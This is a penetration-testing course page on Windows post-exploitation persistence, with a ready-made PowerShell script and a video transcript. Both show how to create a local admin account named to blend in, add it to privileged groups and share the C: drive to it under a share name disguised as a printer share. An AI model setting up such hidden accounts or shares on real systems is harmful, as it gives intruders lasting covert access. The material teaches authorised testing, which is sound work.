Time
7 hours 47 minutes
Difficulty
Advanced
CEU/CPE
10

Video Description

This lesson covers creating a local user, giving it the right group memberships and sharing out a drive in Windows as a persistence mechanism. Participants get step-by-step instructions on creating a new user account with the net user command, checking and adding group memberships with net localgroup, and sharing a drive to that account with net share.
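The steps described above, collected into one script as an added example (this is not code from the video or from Cybrary): it runs the same built-in net.exe commands the lesson uses, then runs the checks that confirm each step took. The account name, password and share name are assumptions chosen for illustration; run it from an elevated prompt on a lab machine you own.

```powershell
# Added example, not from the original lesson. Assumptions: the account name,
# password and share name below are placeholders, and the box is a standalone
# Windows machine on which you already hold local administrator rights.
$User  = 'account4'             # assumption: a name that blends in with account1..account3
$Pass  = 'insecurepassword1'    # assumption: throwaway lab password; use a real one on an engagement
$Share = 'KodakAdministration'  # assumption: a share name that looks like the existing printer shares

# 1. Create the local account: net user <name> <password> /add
#    /y answers the "password longer than 14 characters" prompt non-interactively.
net user $User $Pass /add /y

# 2. Put the account in the groups the real admin accounts are in.
#    (The video also adds HomeUsers, which only exists on some editions.)
foreach ($g in 'Administrators', 'Remote Desktop Users') {
    net localgroup "$g" $User /add
}

# 3. Share the system drive and grant the new account full control:
#    net share <sharename>=<drive:path> /grant:<user>,FULL
net share "$Share=C:" /grant:"$User,FULL"

# Verification: the same things a defender reviewing this box would look at.
net user $User                  # account exists; "Local Group Memberships" lists the groups
net localgroup Administrators   # new account sits beside the legitimate admins
net share $Share                # path C:, permissions include the new account

# Cleanup at the end of the engagement: never leave a backdoor behind.
# net share $Share /delete
# net user $User /delete
```

The share is created with `/grant` even though a local administrator already has full access, for the reason the video gives: the grant also covers the case where the account you want to use is a domain or network account rather than a local one.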

Video Transcription

00:04
Hello, ladies and gentlemen, and welcome to the Post Exploitation Hacking: Persistence and Continued Access course.
00:10
In this class, we're going to be discussing the second stage of our three-stage process, which is actual persistence and backdooring.
00:18
This is going to be the big one for Windows.
00:21
Well, one of the really big ones for Windows,
00:24
in that it is going to be discussing actually creating a new user and making that user sort of a consistent access point for you.
00:34
Um,
00:35
part of this is going to involve actually creating the user, setting permissions, making it sort of blend in.
00:40
Part of it's going to include
00:43
actually sharing out a drive so you can access it as that user,
00:48
and just sort of finding the permissions you can give the user. If you've exploited in as an administrator, or
00:53
in some way escalated your privileges to those of an administrator, that's going to be a great starting point. It will be
01:00
sort of hard to do this otherwise,
01:04
particularly on a Windows 7 machine or a newer box.
01:08
But, as always, we're going to be operating under the assumption that you're a fantastic, super elite hacker, and you exploited your way in as admin, and you've taken over the machine.
01:19
So
01:21
with that, ah, perhaps slightly hopeful thought in mind, we're gonna dig right in.
01:26
So in order to do this properly, we're gonna have to have a return of our old friend net. In this case, we're gonna be using net user.
01:34
So you see these user accounts exist. Remember that there was account1, account2, account3, ASPNET and Perry.
01:41
So
01:44
let's see what we can do with this net user thing.
01:45
Okay?
01:47
That's certainly our current step. We wanna add a user.
01:51
Syntax is net user, username, and then we've got a password.
01:56
Um,
01:57
it has to, you know, that has to, ah,
02:02
follow certain requirements.
02:06
But if you remember back, we saw already in our information gathering that, in net accounts, the password length and password requirements are pretty non-existent.
02:15
Um,
02:15
so we're gonna add the user. We're going to try
02:20
to do some fun stuff with that user
02:22
later on. But first up, being first up,
02:24
pretty easy one. We're gonna do net user /add.
02:29
Username is going to be
02:34
account4.
02:35
Easy as that.
02:37
Uh,
02:38
if you want to give it a password, just for safety's sake. Again, this is a reminder from earlier, because a lot of the backdooring we've been doing, we haven't done anything that requires a password.
02:46
We're doing it that way because this is a basic class. However, if you're actually doing a full-on pen test for a course or for a company, you need to remember to always have some form of authentication for your backdoors. If it's on a production network and someone else could get access to it,
03:02
you need to make sure they have to password-authenticate. Yes, I know you did just exploit your own way in, but make them do the hard work, too. If you leave open a backdoor with no authentication and they come in and take everything,
03:15
you're gonna be in trouble.
03:16
So
03:20
net user /add account4.
03:22
And if you want to do a password, we can say insecurepassword. Nice, strong, terrible password.
03:30
And it says the password is really long and Windows doesn't think you can handle that. That's okay, because it's a little bit after Windows 2000.
03:38
All right, command completed successfully. Let's see if it's telling the truth.
03:42
Look at that: account4.
03:45
So now we have an account4. It exists. It's something we could work with. The thing's even got a password and everything,
03:53
but
03:53
what is account4, actually? Ah, what do,
04:00
what groups is it a part of? How do we find that out? I just typed in the net localgroup command. That's actually not quite right.
04:06
We can actually check net help user and see if we might be able to find it there.
04:12
See, there's lots of interesting nonsense here that we already looked at.
04:15
We don't see a groups list. Okay, well,
04:19
where would it be? The long and short of it is, we actually do use, what we do use, net localgroup,
04:27
but we don't actually use it
04:30
by itself. We actually want to go through and see what groups we want to put this guy in. Right now, he doesn't have any special groups, so we see things that we want him in. Definitely one of the Administrators.
04:41
HomeUsers just might not be bad.
04:44
Remote Desktop Users means he's someone who's allowed to create a remote desktop.
04:48
Okay.
04:49
And of course, Users. He'll probably already be in.
04:56
Sure is.
04:57
So let's change that.
04:59
net localgroup,
05:00
net localgroup Administrators
05:05
/add
05:08
account4.
05:11
net localgroup
05:14
Administrators. Since I can type it. There we go. So you see account1, account4 and Perry. So now we know, going into it, that Perry and account1 were both admin accounts, capable of doing fancy stuff.
05:26
That'll be useful going forward. We also see that account4's in there, and it blends in pretty well.
05:30
So now account4 is a local admin,
05:33
so we've just got to go ahead, do the same thing,
05:38
adding account4 to
05:40
Remote
05:42
Desktop Users.
05:45
Um,
05:46
let's see who's in HomeUsers before we go and add to it.
05:53
Okay, we see that they're admin accounts, and it would make sense for this guy to, ah,
05:58
show up in that one.
06:00
So we add account4.
06:02
All right. So now this admin account, this random account4, looks just like an admin account. It's in the same groups, has the same privileges. It's important.
06:12
Ah, that means that this account could also, you know,
06:15
actually execute things and actually accomplish goals.
06:19
So with that in mind,
06:21
we can go ahead and say something along the lines of runas.
06:27
We see runas
06:30
needs a user, that's the username, and then the program that we actually execute, and then /profile actually loads that user's profile. But that's default, so I don't really have to worry about it.
06:40
So
06:42
we go ahead and do
06:44
runas /user:
06:46
account4
06:48
cmd.
06:49
Let me enter the password. Remember, it's insecure
06:53
password
06:55
1.
06:57
It spits out a command prompt.
06:59
You see that we're in C:\Windows\System32. That's an administrator.
07:03
That's a power. That means we've come in as an administrator. We've come in doing administrator-y things. Obviously we were already in as an administrator, but
07:13
that's in the case that we came in and found ourselves with a command prompt that wasn't doing us any good.
07:18
For example, the netcat that we did earlier,
07:21
or something along those lines. We now have an actual good command prompt, one that could be useful to us, and one that we know
07:30
belongs to a user with all the admin privileges.
07:32
But what can we do as admin? One of the things I mentioned at the beginning of the video is one of the things that's going to be most useful,
07:39
and that's going to be the ability to actually share out drives.
07:43
To do that,
07:45
it's pretty straightforward. We're gonna do net share. We see what we've got shared right now. You see, you know, sharing a bunch of files. We're gonna do net help share
07:53
and see
07:55
what commands they entered to share those files, and what commands we're going to enter.
07:59
So back up here at the very top, you see net share sharename,
08:03
net share sharename=drive:path.
08:05
Okay, let's try. Oh, and then we're gonna want to use this /grant:user,read|change|full,
08:13
just so that we could make sure our important user has everything it needs. So net share,
08:20
for sharename, we want to look back up. What we saw here, we see
08:24
print share, IPC share, Users, Kodak.
08:28
So maybe something along the lines of
08:33
KodakAdministration
08:37
=C
08:41
and /grant:
08:43
account1, or account4. Either. Almost a bad thing.
08:48
Comma,
08:52
huh?
08:56
Oh,
08:56
did something bad there.
09:00
First thing I did badly was spell administration.
09:05
Okay, net share sharename. You will see,
09:09
oh, yeah, I forgot my colon. Never forget your colon.
09:15
It's a very painful thing to forget.
09:16
There we go.
09:18
So we're going to do another net share and see if it's been shared out properly. And look at that: KodakAdministration,
09:24
shared out to C:.
09:26
Who in the world would suspect that? And yet again, we've been looking around, and because of that, we're able to blend in and look like just another one of the many print shares that are up.
09:35
But
09:35
it's sharing out the C drive,
09:37
and it's got full access for account4, specified for account4 just in case.
09:43
That was already going to be a default, but it's still good to know the /grant in case you've got
09:48
a network account but not an actual account on this local machine.
09:54
So now that's shared out. You've got the user account created,
09:58
you've got all the groups added,
10:00
and you've pretty much got access to this machine forever, unless someone comes through and actually sees the account, which again, we specifically did
10:07
account4 because it doesn't really come across as anything. We could have done any name, obviously, but account4 on this machine blends in with the syntax
10:16
and is pretty hard to pick out unless you already knew for sure how many accounts were on.
10:22
Very few people know how many accounts are on. Even people who are security-conscious enough to,
10:26
you know, obviously name things in such a manner are generally not going to be checking it every day. This machine's been up for a while.
10:33
You probably won't remember.
10:35
So there you go. This is a really good way to backdoor a computer, because it's a really difficult one to know about.
10:41
And because it tends to give you better long-term access. Now, not only do you have external access through exploits or however you got in in the first place, you also have internal access. You could walk up to this machine and just
10:54
log into the account.
10:56
Obviously, this wasn't a domain controller. If this was a domain controller, you'd be able to actually access any computer on the network as an administrator,
11:03
and you pretty much own their systems now.
11:07
With that, I think we're gonna go ahead and end this video. As I mentioned, this is one of the most important Windows videos, so I really hope you take your time and
11:15
play with these commands and really get used to using them in a bit of a hurry and using them effectively, so that you can create users and you can hide yourself, and you can just, generally speaking,
11:26
be the best elite hacker you could be.
11:28
I'll see you next time. Until then, I've been me, Joseph Perry, and you've been watching us on Cybrary IT.

Up Next

Post Exploitation Hacking

In this self-paced online training course, you will cover three main topics: Information Gathering, Backdooring and Covering Steps, how to use system specific tools to get general information, listener shells, metasploit and meterpreter scripting.

Instructed By

Joe Perry
Senior Technical Instructor at FireEye, Inc